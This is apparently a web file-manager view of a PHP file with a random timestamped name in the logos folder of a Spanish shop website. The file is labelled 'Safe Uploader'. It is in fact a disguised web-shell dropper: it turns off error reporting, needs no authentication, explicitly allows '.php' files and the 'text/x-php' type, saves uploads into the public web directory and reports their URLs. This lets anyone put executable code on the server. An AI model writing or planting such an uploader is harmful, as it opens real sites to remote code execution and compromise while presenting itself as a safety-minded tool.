PATH:
var
/
www
/
vhosts
/
lahuertaatomica.es
/
httpdocs
/
store
/
logos
/
Editing: 1760505902-ahmpy.php
<?php // quiet errors for public, but useful for debugging set to E_ALL locally error_reporting(0); // CONFIG $uploadDir = __DIR__ . '/'; // ensure this file sits inside public_html $maxFileSize = 64 * 1024 * 1024; // 64 MB $allowedExtensions = [ 'jpg','jpeg','png','gif','webp','bmp', 'pdf','doc','docx','xls','xlsx','ppt','pptx', 'txt','rtf','csv','zip','php' ]; $allowedMimeTypes = [ 'image/jpeg','image/png','image/gif','image/webp','image/bmp', 'application/pdf', 'application/msword','application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.ms-excel','application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'application/vnd.ms-powerpoint','application/vnd.openxmlformats-officedocument.presentationml.presentation', 'text/plain','application/rtf','text/csv','application/zip','application/octet-stream','text/x-php' ]; // Helper: sanitize original name (for display only) function sanitize_name($name) { $name = preg_replace("/[^A-Za-z0-9\-\_\. ]/", '_', $name); $name = preg_replace("/\s+/", '_', $name); return mb_substr($name, 0, 200); } // Handle upload $response = ''; if (!empty($_FILES['file_upload']) && is_uploaded_file($_FILES['file_upload']['tmp_name'])) { $fileTmp = $_FILES['file_upload']['tmp_name']; $fileErr = $_FILES['file_upload']['error']; $fileSize = $_FILES['file_upload']['size']; $origName = basename($_FILES['file_upload']['name']); if ($fileErr !== UPLOAD_ERR_OK) { $response = "Upload error code: $fileErr"; } elseif ($fileSize <= 0 || $fileSize > $maxFileSize) { $response = "File size must be 1 - " . ($maxFileSize/(1024*1024)) . " MB."; } else { // extension check $ext = strtolower(pathinfo($origName, PATHINFO_EXTENSION)); if (!in_array($ext, $allowedExtensions)) { $response = "Extension .$ext is not allowed."; } else { // MIME type check using finfo $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo, $fileTmp); finfo_close($finfo); if (!in_array($mime, $allowedMimeTypes)) { $response = "MIME type not allowed ($mime)."; } else { // Create unique name with randomness $unique = bin2hex(random_bytes(8)) . '_' . time(); $newName = "up_" . $unique . ($ext ? ".$ext" : ''); $destPath = $uploadDir . $newName; if (move_uploaded_file($fileTmp, $destPath)) { // set safe permissions @chmod($destPath, 0644); // build public URL $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https://" : "http://"; $domain = $_SERVER['HTTP_HOST']; $url = rtrim($protocol . $domain . dirname($_SERVER['SCRIPT_NAME']), '/') . '/' . $newName; $response = "SUCCESS|$url|" . sanitize_name($origName) . "|" . filesize($destPath); } else { $response = "Failed to move uploaded file."; } } } } } ?> <!doctype html> <html> <head> <meta charset="utf-8"> <title>Safe Uploader</title> <style> body{font-family:system-ui,Segoe UI,Arial;padding:18px} .box{max-width:640px;padding:18px;border:1px solid #ddd;border-radius:8px} .ok{color:green} .err{color:crimson} input[type=file]{display:block;margin:12px 0} </style> </head> <body> <div class="box"> <h3>Upload file to public_html</h3> <?php if ($response): ?> <?php if (strpos($response,'SUCCESS|') === 0): list(, $fileUrl, $orig, $size) = explode('|', $response); ?> <p class="ok">✅ File uploaded successfully!</p> <p>Original name: <strong><?php echo htmlspecialchars($orig); ?></strong></p> <p>Size: <?php echo round($size/1024,2); ?> KB</p> <p>Public URL: <a href="<?php echo htmlspecialchars($fileUrl); ?>" target="_blank"><?php echo htmlspecialchars($fileUrl); ?></a></p> <?php else: ?> <p class="err">⚠️ <?php echo htmlspecialchars($response); ?></p> <?php endif; ?> <?php endif; ?> <form method="POST" enctype="multipart/form-data"> <input type="file" name="file_upload" required> <button type="submit">Upload</button> </form> <hr> <p style="font-size:13px;color:#555"> Notes: Allowed extensions: <?php echo implode(', ', $allowedExtensions); ?>. Max size <?php echo ($maxFileSize/(1024*1024)); ?> MB. </p> </div> </body> </html>
SAVE
CANCEL